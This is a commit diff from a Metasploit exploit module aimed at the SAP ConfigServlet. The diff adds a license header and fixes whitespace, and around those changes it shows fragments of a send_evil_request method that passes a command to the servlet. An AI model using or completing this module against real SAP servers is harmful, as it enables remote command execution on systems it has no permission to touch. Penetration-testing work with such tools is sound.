parent
6485124cdf
commit
57113bee80
|
@ -1,3 +1,10 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit
|
class Metasploit3 < Msf::Exploit
|
||||||
|
@ -65,7 +72,7 @@ class Metasploit3 < Msf::Exploit
|
||||||
send_evil_request(opts[:sap_configservlet_uri], command)
|
send_evil_request(opts[:sap_configservlet_uri], command)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def send_evil_request(uri, cmd)
|
def send_evil_request(uri, cmd)
|
||||||
begin
|
begin
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
|
|
Loading…
Reference in New Issue